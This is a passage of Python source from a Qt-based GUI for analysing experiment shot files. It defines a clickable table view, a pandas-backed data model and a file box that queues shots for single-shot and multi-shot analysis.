    doubleLeftClicked(index) in addition when that click completed a double
    click. Multiple inheritance of QObjects is not possible, so we are
    forced to duplicate code instead of sharing code with the extremely
    similar TreeView class in this module."""
    leftClicked = Signal(QtCore.QModelIndex)
    doubleLeftClicked = Signal(QtCore.QModelIndex)

    def __init__(self, *args):
        QtWidgets.QTableView.__init__(self, *args)
        self._pressed_index = None
        self._double_click = False

    def mousePressEvent(self, event):
        result = QtWidgets.QTableView.mousePressEvent(self, event)
        index = self.indexAt(event.pos())
        if index.isValid() and event.button() == QtCore.Qt.LeftButton:
            self._pressed_index = self.indexAt(event.pos())
        return result

    def leaveEvent(self, event):
        result = QtWidgets.QTableView.leaveEvent(self, event)
        # Pointer left the widget: abandon any click in progress.
        self._pressed_index = None
        self._double_click = False
        return result

    def mouseDoubleClickEvent(self, event):
        # Ensure our left click event occurs regardless of whether it is the
        # second click in a double click or not
        result = QtWidgets.QTableView.mouseDoubleClickEvent(self, event)
        index = self.indexAt(event.pos())
        if index.isValid() and event.button() == QtCore.Qt.LeftButton:
            self._pressed_index = self.indexAt(event.pos())
            self._double_click = True
        return result

    def mouseReleaseEvent(self, event):
        result = QtWidgets.QTableView.mouseReleaseEvent(self, event)
        index = self.indexAt(event.pos())
        released_on_pressed_index = (
            event.button() == QtCore.Qt.LeftButton
            and index.isValid()
            and index == self._pressed_index
        )
        if released_on_pressed_index:
            self.leftClicked.emit(index)
            if self._double_click:
                self.doubleLeftClicked.emit(index)
        self._pressed_index = None
        self._double_click = False
        return result
class DataFrameModel(QtCore.QObject):
    """Keeps a pandas DataFrame of per-shot scalar data in sync with a Qt
    QStandardItemModel displayed in a QTableView. Rows correspond to shot
    files; columns to results, plus two fixed columns holding the analysis
    status/progress and the shot filepath."""

    # Fixed column positions:
    COL_STATUS = 0
    COL_FILEPATH = 1
    # Custom data roles on the status item:
    ROLE_STATUS_PERCENT = QtCore.Qt.UserRole + 1
    ROLE_DELETED_OFF_DISK = QtCore.Qt.UserRole + 2

    # Emitted whenever columns are added to or removed from the model:
    columns_changed = Signal()

    def __init__(self, view, exp_config):
        QtCore.QObject.__init__(self)
        self._view = view
        self.exp_config = exp_config
        self._model = UneditableModel()
        # Mapping of shot filepath -> row number, for fast lookup:
        self.row_number_by_filepath = {}
        # Number of digits in the row labels last time we renumbered, so we
        # know when every label must be re-padded:
        self._previous_n_digits = 0
        self._header = HorizontalHeaderViewWithWidgets(self._model)
        self._vertheader = QtWidgets.QHeaderView(QtCore.Qt.Vertical)
        self._vertheader.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
        # Smaller font for headers:
        font = self._vertheader.font()
        font.setPointSize(10 if sys.platform == 'darwin' else 8)
        self._header.setFont(font)
        font.setFamily('Ubuntu Mono')
        self._vertheader.setFont(font)
        self._vertheader.setHighlightSections(True)
        self._vertheader.setSectionsClickable(True)
        self._view.setModel(self._model)
        self._view.setHorizontalHeader(self._header)
        self._view.setVerticalHeader(self._vertheader)
        # Delegate draws a progress bar in the status column:
        self._delegate = ItemDelegate(self._view, self._model, self.COL_STATUS, self.ROLE_STATUS_PERCENT)
        self._view.setItemDelegate(self._delegate)
        self._view.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
        self._view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        # Check if integer indexing is to be used for row labels:
        try:
            self.integer_indexing = self.exp_config.getboolean('lyse', 'integer_indexing')
        except (LabConfig.NoOptionError, LabConfig.NoSectionError):
            self.integer_indexing = False
        # This dataframe will contain all the scalar data
        # from the shot files that are currently open:
        index = pandas.MultiIndex.from_tuples([('filepath', '')])
        self.dataframe = pandas.DataFrame({'filepath': []}, columns=index)
        # How many levels the dataframe's multiindex has:
        self.nlevels = self.dataframe.columns.nlevels
        status_item = QtGui.QStandardItem()
        status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
        status_item.setToolTip('status/progress of single-shot analysis')
        self._model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
        filepath_item = QtGui.QStandardItem('filepath')
        filepath_item.setToolTip('filepath')
        self._model.setHorizontalHeaderItem(self.COL_FILEPATH, filepath_item)
        self._view.setColumnWidth(self.COL_STATUS, 70)
        self._view.setColumnWidth(self.COL_FILEPATH, 100)
        # Column indices to names and vice versa for fast lookup:
        self.column_indices = {'__status': self.COL_STATUS, ('filepath', ''): self.COL_FILEPATH}
        self.column_names = {self.COL_STATUS: '__status', self.COL_FILEPATH: ('filepath', '')}
        self.columns_visible = {self.COL_STATUS: True, self.COL_FILEPATH: True}
        # Whether or not a deleted column was visible at the time it was deleted (by name):
        self.deleted_columns_visible = {}
        # Make the actions for the context menu:
        self.action_remove_selected = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected shots', self._view)
        self.connect_signals()

    def connect_signals(self):
        """Connect view signals to this object's handlers."""
        self._view.customContextMenuRequested.connect(self.on_view_context_menu_requested)
        self.action_remove_selected.triggered.connect(self.on_remove_selection)

    def on_remove_selection(self):
        self.remove_selection()

    def remove_selection(self, confirm=True):
        """Remove the currently selected shots from the dataframe and the Qt
        model, asking the user for confirmation unless confirm is False."""
        selection_model = self._view.selectionModel()
        selected_indexes = selection_model.selectedRows()
        selected_name_items = [self._model.itemFromIndex(index) for index in selected_indexes]
        if not selected_name_items:
            return
        if confirm and not question_dialog("Remove %d shots?" % len(selected_name_items)):
            return
        # Remove from DataFrame first. Pass an explicit list of row labels
        # (previously a generator, which pandas' drop may consume only once):
        self.dataframe = self.dataframe.drop([index.row() for index in selected_indexes])
        self.dataframe.index = pandas.Index(range(len(self.dataframe)))
        # Delete one at a time from Qt model. Each item reports its row
        # afresh, so row shifts from earlier removals are accounted for:
        for name_item in selected_name_items:
            row = name_item.row()
            self._model.removeRow(row)
        self.renumber_rows()

    def mark_selection_not_done(self):
        """Reset the analysis progress of the selected shots to zero so that
        the analysis loop will re-analyse them."""
        selected_indexes = self._view.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        for row in selected_rows:
            status_item = self._model.item(row, self.COL_STATUS)
            if status_item.data(self.ROLE_DELETED_OFF_DISK):
                # If the shot was previously not readable on disk, check to
                # see if it's readable now. It may have been undeleted or
                # perhaps it being unreadable before was due to a network
                # glitch or similar.
                filepath = self._model.item(row, self.COL_FILEPATH).text()
                if not os.path.exists(filepath):
                    continue
                # Shot file is accessible again:
                status_item.setData(False, self.ROLE_DELETED_OFF_DISK)
                status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
                status_item.setToolTip(None)
            status_item.setData(0, self.ROLE_STATUS_PERCENT)

    def on_view_context_menu_requested(self, point):
        menu = QtWidgets.QMenu(self._view)
        menu.addAction(self.action_remove_selected)
        menu.exec_(QtGui.QCursor.pos())

    def on_double_click(self, index):
        """Open the double-clicked shot file in the configured HDF5 viewer."""
        filepath_item = self._model.item(index.row(), self.COL_FILEPATH)
        shot_filepath = filepath_item.text()
        # get path to text editor
        viewer_path = self.exp_config.get('programs', 'hdf5_viewer')
        viewer_args = self.exp_config.get('programs', 'hdf5_viewer_arguments')
        if not viewer_path:
            error_dialog("No hdf5 viewer specified in the labconfig.")
            # Bugfix: previously fell through and attempted to launch an
            # empty viewer path after showing the error dialog.
            return
        if '{file}' in viewer_args:
            # Split the args on spaces into a list, replacing {file} with the labscript file
            viewer_args = [arg if arg != '{file}' else shot_filepath for arg in viewer_args.split()]
        else:
            # Otherwise if {file} isn't already in there, append it to the other args:
            viewer_args = [shot_filepath] + viewer_args.split()
        try:
            subprocess.Popen([viewer_path] + viewer_args)
        except Exception as e:
            error_dialog("Unable to launch hdf5 viewer specified in %s. Error was: %s" %
                         (self.exp_config.config_path, str(e)))

    def set_columns_visible(self, columns_visible):
        """Apply a {column_index: visible} mapping to the view."""
        self.columns_visible = columns_visible
        for column_index, visible in columns_visible.items():
            self._view.setColumnHidden(column_index, not visible)

    def update_column_levels(self):
        """Pads the keys and values of our lists of column names so that
        they still match those in the dataframe after the number of
        levels in its multiindex has increased"""
        extra_levels = self.dataframe.columns.nlevels - self.nlevels
        if extra_levels > 0:
            self.nlevels = self.dataframe.columns.nlevels
            column_indices = {}
            column_names = {}
            for column_name in self.column_indices:
                if not isinstance(column_name, tuple):
                    # It's one of our special columns
                    new_column_name = column_name
                else:
                    new_column_name = column_name + ('',) * extra_levels
                column_index = self.column_indices[column_name]
                column_indices[new_column_name] = column_index
                column_names[column_index] = new_column_name
            self.column_indices = column_indices
            self.column_names = column_names

    @inmain_decorator()
    def mark_as_deleted_off_disk(self, filepath):
        """Flag a shot as deleted/unreadable on disk so that analysis is not
        re-attempted on it. Runs in the main thread."""
        # Confirm the shot hasn't been removed from lyse (we are in the main
        # thread so there is no race condition in checking first)
        if filepath not in self.dataframe['filepath'].values:
            # Shot has been removed from FileBox, nothing to do here:
            return
        row_number = self.row_number_by_filepath[filepath]
        status_item = self._model.item(row_number, self.COL_STATUS)
        already_marked_as_deleted = status_item.data(self.ROLE_DELETED_OFF_DISK)
        if already_marked_as_deleted:
            return
        # Icon only displays if percent completion is 100. This is also
        # important so that the shot is not picked up as analysis
        # incomplete and analysis re-attempted on it.
        status_item.setData(True, self.ROLE_DELETED_OFF_DISK)
        status_item.setData(100, self.ROLE_STATUS_PERCENT)
        status_item.setToolTip("Shot has been deleted off disk or is unreadable")
        status_item.setIcon(QtGui.QIcon(':qtutils/fugue/drive--minus'))
        app.output_box.output('Warning: Shot deleted from disk or no longer readable %s\n' % filepath, red=True)

    @inmain_decorator()
    def update_row(self, filepath, dataframe_already_updated=False, status_percent=None, new_row_data=None, updated_row_data=None):
        """Updates a row in the dataframe and Qt model to the data in the
        HDF5 file for that shot. Also sets the percent done, if specified.

        Exactly one of new_row_data (a full replacement row) or
        updated_row_data (a {(group, name): value} dict of changed results)
        must be given, unless dataframe_already_updated is True."""
        # Validate arguments and locate the row before touching the Qt model:
        if (new_row_data is None) == (updated_row_data is None) and not dataframe_already_updated:
            raise ValueError('Exactly one of new_row_data or updated_row_data must be provided')
        try:
            row_number = self.row_number_by_filepath[filepath]
        except KeyError:
            # Row has been deleted, nothing to do here:
            return
        filepath_colname = ('filepath',) + ('',) * (self.nlevels - 1)
        assert filepath == self.dataframe.at[row_number, filepath_colname]
        if updated_row_data is not None and not dataframe_already_updated:
            for group, name in updated_row_data:
                column_name = (group, name) + ('',) * (self.nlevels - 2)
                value = updated_row_data[group, name]
                try:
                    self.dataframe.at[row_number, column_name] = value
                except ValueError:
                    # did the column not already exist when we tried to set an iterable?
                    if column_name not in self.dataframe.columns:
                        # create it with a non-iterable and then overwrite with the iterable value:
                        self.dataframe.at[row_number, column_name] = None
                    else:
                        # Incompatible datatype - convert the datatype of the column to
                        # 'object'
                        self.dataframe[column_name] = self.dataframe[column_name].astype('object')
                    # Now that the column exists and has dtype object, we can set the value:
                    self.dataframe.at[row_number, column_name] = value
            dataframe_already_updated = True
        if not dataframe_already_updated:
            if new_row_data is None:
                raise ValueError("If dataframe_already_updated is False, then new_row_data, as returned "
                                 "by dataframe_utils.get_dataframe_from_shot(filepath) must be provided.")
            self.dataframe = replace_with_padding(self.dataframe, new_row_data, row_number)
            self.update_column_levels()
        # To speed things up, block signals to the model during the update.
        # Bugfix: signals were previously blocked before the early returns
        # and raises above, which left the model permanently blocked on
        # those paths.
        self._model.blockSignals(True)
        # Check and create necessary new columns in the Qt model:
        new_column_names = set(self.dataframe.columns) - set(self.column_names.values())
        new_columns_start = self._model.columnCount()
        self._model.insertColumns(new_columns_start, len(new_column_names))
        for i, column_name in enumerate(sorted(new_column_names)):
            # Set the header label of the new column:
            column_number = new_columns_start + i
            self.column_names[column_number] = column_name
            self.column_indices[column_name] = column_number
            if column_name in self.deleted_columns_visible:
                # Restore the former visibility of this column if we've
                # seen one with its name before:
                visible = self.deleted_columns_visible[column_name]
                self.columns_visible[column_number] = visible
                self._view.setColumnHidden(column_number, not visible)
            else:
                # new columns are visible by default:
                self.columns_visible[column_number] = True
            column_name_as_string = '\n'.join(column_name).strip()
            header_item = QtGui.QStandardItem(column_name_as_string)
            header_item.setToolTip(column_name_as_string)
            self._model.setHorizontalHeaderItem(column_number, header_item)
        # Check and remove any no-longer-needed columns in the Qt model:
        defunct_column_names = (set(self.column_names.values()) - set(self.dataframe.columns)
                                - {self.column_names[self.COL_STATUS], self.column_names[self.COL_FILEPATH]})
        defunct_column_indices = [self.column_indices[column_name] for column_name in defunct_column_names]
        for column_number in sorted(defunct_column_indices, reverse=True):
            # Remove columns from the Qt model. In reverse order so that
            # removals do not change the position of columns yet to be
            # removed.
            self._model.removeColumn(column_number)
            # Save whether or not the column was visible when it was
            # removed (so that if it is re-added the visibility will be retained):
            self.deleted_columns_visible[self.column_names[column_number]] = self.columns_visible[column_number]
            del self.column_names[column_number]
            del self.columns_visible[column_number]
        if defunct_column_indices:
            # Renumber the keys of self.columns_visible and self.column_names to reflect deletions:
            self.column_names = {newindex: name for newindex, (oldindex, name) in enumerate(sorted(self.column_names.items()))}
            self.columns_visible = {newindex: visible for newindex, (oldindex, visible) in enumerate(sorted(self.columns_visible.items()))}
            # Update the inverse mapping of self.column_names:
            self.column_indices = {name: index for index, name in self.column_names.items()}
        # Update the data in the Qt model:
        dataframe_row = self.dataframe.iloc[row_number].to_dict()
        for column_number, column_name in self.column_names.items():
            if not isinstance(column_name, tuple):
                # One of our special columns, does not correspond to a column in the dataframe:
                continue
            if updated_row_data is not None and column_name not in updated_row_data:
                continue
            value = dataframe_row[column_name]
            if isinstance(value, float):
                value_str = scientific_notation(value)
            else:
                value_str = str(value)
            lines = value_str.splitlines()
            if len(lines) > 1:
                # Show only the first line of multiline values in the cell:
                short_value_str = lines[0] + ' ...'
            else:
                short_value_str = value_str
            item = self._model.item(row_number, column_number)
            if item is None:
                # This is the first time we've written a value to this part of the model:
                item = QtGui.QStandardItem(short_value_str)
                item.setData(QtCore.Qt.AlignCenter, QtCore.Qt.TextAlignmentRole)
                self._model.setItem(row_number, column_number, item)
            else:
                item.setText(short_value_str)
            item.setToolTip(repr(value))
        for i, column_name in enumerate(sorted(new_column_names)):
            # Resize any new columns to fit contents:
            column_number = new_columns_start + i
            self._view.resizeColumnToContents(column_number)
        if status_percent is not None:
            status_item = self._model.item(row_number, self.COL_STATUS)
            status_item.setData(status_percent, self.ROLE_STATUS_PERCENT)
        if new_column_names or defunct_column_names:
            self.columns_changed.emit()
        # unblock signals to the model and tell it to update
        self._model.blockSignals(False)
        self._model.layoutChanged.emit()

    def new_row(self, filepath, done=False):
        """Return the [status_item, name_item] pair for a new shot row."""
        status_item = QtGui.QStandardItem()
        if done:
            status_item.setData(100, self.ROLE_STATUS_PERCENT)
            status_item.setIcon(QtGui.QIcon(':/qtutils/fugue/tick'))
        else:
            status_item.setData(0, self.ROLE_STATUS_PERCENT)
            # NOTE(review): both branches set a tick icon. The delegate draws
            # a progress bar while percent < 100, so this icon is apparently
            # never shown for incomplete shots -- confirm before changing.
            status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
        name_item = QtGui.QStandardItem(filepath)
        return [status_item, name_item]

    def renumber_rows(self, add_from=0):
        """Add/update row indices - the rows are numbered in simple sequential
        order for easy comparison with the dataframe. add_from allows you to
        only add numbers for new rows from the given index as a performance
        optimisation, though if the number of digits changes, all rows will
        still be renumbered. add_from should not be used if rows have been
        deleted."""
        n_digits = len(str(self._model.rowCount()))
        if n_digits != self._previous_n_digits:
            # All labels must be updated:
            add_from = 0
            self._previous_n_digits = n_digits
        if add_from == 0:
            self.row_number_by_filepath = {}
        for row_number in range(add_from, self._model.rowCount()):
            vertical_header_item = self._model.verticalHeaderItem(row_number)
            row_number_str = str(row_number).rjust(n_digits)
            vert_header_text = '{}. '.format(row_number_str)
            filepath_item = self._model.item(row_number, self.COL_FILEPATH)
            filepath = filepath_item.text()
            self.row_number_by_filepath[filepath] = row_number
            if self.integer_indexing:
                header_cols = ['sequence_index', 'run number', 'run repeat']
                header_strings = []
                for col in header_cols:
                    val = self.dataframe[col].values[row_number]
                    if pandas.notna(val):
                        # int() cast: NaN padding can make these columns float
                        # dtype, and the 'd' format code rejects floats.
                        header_strings.append('{:04d}'.format(int(val)))
                    else:
                        header_strings.append('----')
                vert_header_text += ' | '.join(header_strings)
            else:
                basename = os.path.splitext(os.path.basename(filepath))[0]
                vert_header_text += basename
            vertical_header_item.setText(vert_header_text)

    @inmain_decorator()
    def add_files(self, filepaths, new_row_data, done=False):
        """Add files to the dataframe model. new_row_data should be a
        dataframe containing the new rows. Runs in the main thread."""
        to_add = []
        # Check for duplicates:
        for filepath in filepaths:
            if filepath in self.row_number_by_filepath or filepath in to_add:
                app.output_box.output('Warning: Ignoring duplicate shot %s\n' % filepath, red=True)
                if new_row_data is not None:
                    # Drop the duplicate's row from the incoming data too:
                    df_row_index = np.where(new_row_data['filepath'].values == filepath)
                    new_row_data = new_row_data.drop(df_row_index[0])
                    new_row_data.index = pandas.Index(range(len(new_row_data)))
            else:
                to_add.append(filepath)
        assert len(new_row_data) == len(to_add)
        if to_add:
            # Update the dataframe:
            self.dataframe = concat_with_padding(self.dataframe, new_row_data)
            self.update_column_levels()
            app.filebox.set_add_shots_progress(None, None, "updating filebox")
            for filepath in to_add:
                # Add the new rows to the Qt model:
                self._model.appendRow(self.new_row(filepath, done=done))
                vert_header_item = QtGui.QStandardItem('...loading...')
                self._model.setVerticalHeaderItem(self._model.rowCount() - 1, vert_header_item)
                self._view.resizeRowToContents(self._model.rowCount() - 1)
            self.renumber_rows(add_from=self._model.rowCount()-len(to_add))
            # Update the Qt model:
            for filepath in to_add:
                self.update_row(filepath, dataframe_already_updated=True)

    @inmain_decorator()
    def get_first_incomplete(self):
        """Returns the filepath of the first shot in the model that has not
        been analysed, or None if all are complete."""
        for row in range(self._model.rowCount()):
            status_item = self._model.item(row, self.COL_STATUS)
            if status_item.data(self.ROLE_STATUS_PERCENT) != 100:
                filepath_item = self._model.item(row, self.COL_FILEPATH)
                return filepath_item.text()
class FileBox(object):
    """GUI panel listing loaded shot files.

    Receives shot filepaths on an incoming queue, adds them to a
    DataFrameModel, and runs two daemon threads: one buffering incoming
    shots, and one feeding unanalysed shots to the single-shot and
    multi-shot routineboxes via the provided queues.
    """
    def __init__(self, container, exp_config, to_singleshot, from_singleshot, to_multishot, from_multishot):
        # Queues connecting us to the singleshot and multishot routineboxes:
        self.exp_config = exp_config
        self.to_singleshot = to_singleshot
        self.to_multishot = to_multishot
        self.from_singleshot = from_singleshot
        self.from_multishot = from_multishot
        self.logger = logging.getLogger('lyse.FileBox')
        self.logger.info('starting')
        loader = UiLoader()
        loader.registerCustomWidget(TableView)
        self.ui = loader.load(os.path.join(LYSE_DIR, 'filebox.ui'))
        self.ui.progressBar_add_shots.hide()
        container.addWidget(self.ui)
        self.shots_model = DataFrameModel(self.ui.tableView, self.exp_config)
        set_auto_scroll_to_end(self.ui.tableView.verticalScrollBar())
        self.edit_columns_dialog = EditColumns(self, self.shots_model.column_names, self.shots_model.columns_visible)
        self.last_opened_shots_folder = self.exp_config.get('paths', 'experiment_shot_storage')
        self.connect_signals()
        self.analysis_paused = False
        self.multishot_required = False
        # An Event to let the analysis thread know to check for shots that
        # need analysing, rather than using a time.sleep:
        self.analysis_pending = threading.Event()
        # The folder that the 'add shots' dialog will open to:
        self.current_folder = self.exp_config.get('paths', 'experiment_shot_storage')
        # A queue for storing incoming files from the ZMQ server so
        # the server can keep receiving files even if analysis is slow
        # or paused:
        self.incoming_queue = queue.Queue()
        # Start the thread to handle incoming files, and store them in
        # a buffer if processing is paused:
        self.incoming = threading.Thread(target=self.incoming_buffer_loop)
        self.incoming.daemon = True
        self.incoming.start()
        self.analysis = threading.Thread(target = self.analysis_loop)
        self.analysis.daemon = True
        self.analysis.start()
    def connect_signals(self):
        """Connect UI widget signals to their handlers."""
        self.ui.pushButton_edit_columns.clicked.connect(self.on_edit_columns_clicked)
        self.shots_model.columns_changed.connect(self.on_columns_changed)
        self.ui.toolButton_add_shots.clicked.connect(self.on_add_shot_files_clicked)
        self.ui.toolButton_remove_shots.clicked.connect(self.shots_model.on_remove_selection)
        self.ui.tableView.doubleLeftClicked.connect(self.shots_model.on_double_click)
        self.ui.pushButton_analysis_running.toggled.connect(self.on_analysis_running_toggled)
        self.ui.pushButton_mark_as_not_done.clicked.connect(self.on_mark_selection_not_done_clicked)
        self.ui.pushButton_run_multishot_analysis.clicked.connect(self.on_run_multishot_analysis_clicked)
    def on_edit_columns_clicked(self):
        self.edit_columns_dialog.show()
    def on_columns_changed(self):
        """Keep the edit-columns dialog in sync with the model's columns."""
        column_names = self.shots_model.column_names
        columns_visible = self.shots_model.columns_visible
        self.edit_columns_dialog.update_columns(column_names, columns_visible)
    def on_add_shot_files_clicked(self):
        """Show a file dialog and queue the selected shot files for loading."""
        shot_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
                                                            'Select shot files',
                                                            self.last_opened_shots_folder,
                                                            "HDF5 files (*.h5)")
        # Some Qt bindings return (filenames, selected_filter) tuples:
        if type(shot_files) is tuple:
            shot_files, _ = shot_files
        if not shot_files:
            # User cancelled selection
            return
        # Convert to standard platform specific path, otherwise Qt likes forward slashes:
        shot_files = [os.path.abspath(shot_file) for shot_file in shot_files]
        # Save the containing folder for use next time we open the dialog box:
        self.last_opened_shots_folder = os.path.dirname(shot_files[0])
        # Queue the files to be opened:
        for filepath in shot_files:
            self.incoming_queue.put(filepath)
    def on_analysis_running_toggled(self, pressed):
        """Pause or resume the analysis loop when the toggle button changes."""
        if pressed:
            self.analysis_paused = True
            self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
            self.ui.pushButton_analysis_running.setText('Analysis paused')
        else:
            self.analysis_paused = False
            # NOTE(review): both branches use the same 'control' icon --
            # possibly one was intended to be a pause icon; confirm.
            self.ui.pushButton_analysis_running.setIcon(QtGui.QIcon(':qtutils/fugue/control'))
            self.ui.pushButton_analysis_running.setText('Analysis running')
            # Wake the analysis thread so it resumes immediately:
            self.analysis_pending.set()
    def on_mark_selection_not_done_clicked(self):
        self.shots_model.mark_selection_not_done()
        # Let the analysis loop know to look for these shots:
        self.analysis_pending.set()
    def on_run_multishot_analysis_clicked(self):
        self.multishot_required = True
        self.analysis_pending.set()
    def set_columns_visible(self, columns_visible):
        self.shots_model.set_columns_visible(columns_visible)
    @inmain_decorator()
    def set_add_shots_progress(self, completed, total, message):
        """Update the 'adding shots' progress bar. Runs in the main thread.
        Hides the bar when completed == total and message is None."""
        self.ui.progressBar_add_shots.setFormat("Adding shots: [{}] %v/%m (%p%)".format(message))
        if completed == total and message is None:
            self.ui.progressBar_add_shots.hide()
        else:
            if total is not None:
                self.ui.progressBar_add_shots.setMaximum(total)
            if completed is not None:
                self.ui.progressBar_add_shots.setValue(completed)
            if self.ui.progressBar_add_shots.isHidden():
                self.ui.progressBar_add_shots.show()
        if completed is None and total is None and message is not None:
            # Ensure a repaint when only the message changes:
            self.ui.progressBar_add_shots.repaint()
    def incoming_buffer_loop(self):
        """We use a queue as a buffer for incoming shots. We don't want to hang and not
        respond to a client submitting shots, so we just let shots pile up here until we can get to them.
        The downside to this is that we can't return errors to the client if the shot cannot be added,
        but the suggested workflow is to handle errors here anyway. A client running shots shouldn't stop
        the experiment on account of errors from the analyis stage, so what's the point of passing errors to it?
        We'll just raise errors here and the user can decide what to do with them."""
        logger = logging.getLogger('lyse.FileBox.incoming')
        # HDF5 prints lots of errors by default, for things that aren't
        # actually errors. These are silenced on a per thread basis,
        # and automatically silenced in the main thread when h5py is
        # imported. So we'll silence them in this thread too:
        h5py._errors.silence_errors()
        n_shots_added = 0
        while True:
            try:
                filepaths = []
                # Block until at least one shot arrives:
                filepath = self.incoming_queue.get()
                filepaths.append(filepath)
                if self.incoming_queue.qsize() == 0:
                    # Wait momentarily in case more arrive so we can batch process them:
                    time.sleep(0.1)
                # Batch process to decrease number of dataframe concatenations:
                batch_size = len(self.shots_model.dataframe) // 3 + 1
                while True:
                    try:
                        filepath = self.incoming_queue.get(False)
                    except queue.Empty:
                        break
                    else:
                        filepaths.append(filepath)
                        if len(filepaths) >= batch_size:
                            break
                logger.info('adding:\n%s' % '\n'.join(filepaths))
                if n_shots_added == 0:
                    total_shots = self.incoming_queue.qsize() + len(filepaths)
                    self.set_add_shots_progress(1, total_shots, "reading shot files")
                # Remove duplicates from the list (preserving order) in case the
                # client sent the same filepath multiple times:
                filepaths = sorted(set(filepaths), key=filepaths.index) # Inefficient but readable
                # We open the HDF5 files here outside the GUI thread so as not to hang the GUI:
                dataframes = []
                indices_of_files_not_found = []
                for i, filepath in enumerate(filepaths):
                    try:
                        dataframe = get_dataframe_from_shot(filepath)
                        dataframes.append(dataframe)
                    except IOError:
                        app.output_box.output('Warning: Ignoring shot file not found or not readable %s\n' % filepath, red=True)
                        indices_of_files_not_found.append(i)
                    n_shots_added += 1
                    shots_remaining = self.incoming_queue.qsize()
                    total_shots = n_shots_added + shots_remaining + len(filepaths) - (i + 1)
                    self.set_add_shots_progress(n_shots_added, total_shots, "reading shot files")
                self.set_add_shots_progress(n_shots_added, total_shots, "concatenating dataframes")
                if dataframes:
                    new_row_data = concat_with_padding(*dataframes)
                else:
                    new_row_data = None
                # Do not add the shots that were not found on disk. Reverse
                # loop so that removing an item doesn't change the indices of
                # subsequent removals:
                for i in reversed(indices_of_files_not_found):
                    del filepaths[i]
                if filepaths:
                    self.shots_model.add_files(filepaths, new_row_data)
                    # Let the analysis loop know to look for new shots:
                    self.analysis_pending.set()
                if shots_remaining == 0:
                    self.set_add_shots_progress(n_shots_added, total_shots, None)
                    n_shots_added = 0 # reset our counter for the next batch
            except Exception:
                # Keep this incoming loop running at all costs, but make the
                # otherwise uncaught exception visible to the user:
                zprocess.raise_exception_in_thread(sys.exc_info())
    def analysis_loop(self):
        """Daemon-thread loop: wait for pending work, analyse all incomplete
        shots one at a time, then run multishot analysis if required."""
        logger = logging.getLogger('lyse.FileBox.analysis_loop')
        # HDF5 prints lots of errors by default, for things that aren't
        # actually errors. These are silenced on a per thread basis,
        # and automatically silenced in the main thread when h5py is
        # imported. So we'll silence them in this thread too:
        h5py._errors.silence_errors()
        while True:
            try:
                self.analysis_pending.wait()
                self.analysis_pending.clear()
                at_least_one_shot_analysed = False
                while True:
                    if not self.analysis_paused:
                        # Find the first shot that has not finished being analysed:
                        filepath = self.shots_model.get_first_incomplete()
                        if filepath is not None:
                            logger.info('analysing: %s'%filepath)
                            self.do_singleshot_analysis(filepath)
                            at_least_one_shot_analysed = True
                        if filepath is None and at_least_one_shot_analysed:
                            self.multishot_required = True
                        if filepath is None:
                            break
                        if self.multishot_required:
                            logger.info('doing multishot analysis')
                            self.do_multishot_analysis()
                    else:
                        logger.info('analysis is paused')
                        break
                if self.multishot_required:
                    logger.info('doing multishot analysis')
                    self.do_multishot_analysis()
            except Exception:
                etype, value, tb = sys.exc_info()
                orig_exception = ''.join(traceback.format_exception_only(etype, value))
                message = ('Analysis loop encountered unexpected exception. ' +
                           'This is a bug and should be reported. The analysis ' +
                           'loop is continuing, but lyse may be in an inconsistent state. '
                           'Restart lyse, or continue at your own risk. '
                           'Original exception was:\n\n' + orig_exception)
                # Raise the exception in a thread so we can keep running
                zprocess.raise_exception_in_thread((RuntimeError, RuntimeError(message), tb))
                self.pause_analysis()
    @inmain_decorator()
    def pause_analysis(self):
        # This automatically triggers the slot that sets self.analysis_paused
        self.ui.pushButton_analysis_running.setChecked(True)
    def do_singleshot_analysis(self, filepath):
        """Send one shot to the singleshot routinebox and process progress,
        data, and completion/error messages until it is done."""
        # Check the shot file exists before sending it to the singleshot
        # routinebox. This does not guarantee it won't have been deleted by
        # the time the routinebox starts running analysis on it, but by
        # detecting it now we can most of the time avoid the user code
        # coughing exceptions due to the file not existing. Which would also
        # not be a problem, but this way we avoid polluting the outputbox with
        # more errors than necessary.
        if not os.path.exists(filepath):
            self.shots_model.mark_as_deleted_off_disk(filepath)
            return
        self.to_singleshot.put(filepath)
        while True:
            signal, status_percent, updated_data = self.from_singleshot.get()
            for file in updated_data:
                # Update the data for all the rows with new data:
                self.shots_model.update_row(file, updated_row_data=updated_data[file])
            # Update the status percent for the the row on which analysis is actually running:
            self.shots_model.update_row(filepath, status_percent=status_percent, dataframe_already_updated=True)
            if signal == 'done':
                return
            if signal == 'error':
                if not os.path.exists(filepath):
                    # Do not pause if the file has been deleted. An error is
                    # no surprise there:
                    self.shots_model.mark_as_deleted_off_disk(filepath)
                else:
                    self.pause_analysis()
                return
            if signal == 'progress':
                continue
            raise ValueError('invalid signal %s' % str(signal))
    def do_multishot_analysis(self):
        """Trigger the multishot routinebox and process its messages until
        it reports completion or an error."""
        self.to_multishot.put(None)
        while True:
            signal, _, updated_data = self.from_multishot.get()
            for file in updated_data:
                self.shots_model.update_row(file, updated_row_data=updated_data[file])
            if signal == 'done':
                self.multishot_required = False
                return
            elif signal == 'error':
                self.pause_analysis()
                return
class Lyse(object):
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'main.ui'), LyseMainWindow())
self.connect_signals()
self.setup_config()
self.port = int(self.exp_config.get('ports', 'lyse'))
# The singleshot routinebox will be connected to the filebox
# by queues:
to_singleshot = queue.Queue()
from_singleshot = queue.Queue()
# So will the multishot routinebox:
to_multishot = queue.Queue()
from_multishot = queue.Queue()
self.output_box = OutputBox(self.ui.verticalLayout_output_box)
self.singleshot_routinebox = RoutineBox(self.ui.verticalLayout_singleshot_routinebox, self.exp_config,
self, to_singleshot, from_singleshot, self.output_box.port)
self.multishot_routinebox = RoutineBox(self.ui.verticalLayout_multishot_routinebox, self.exp_config,
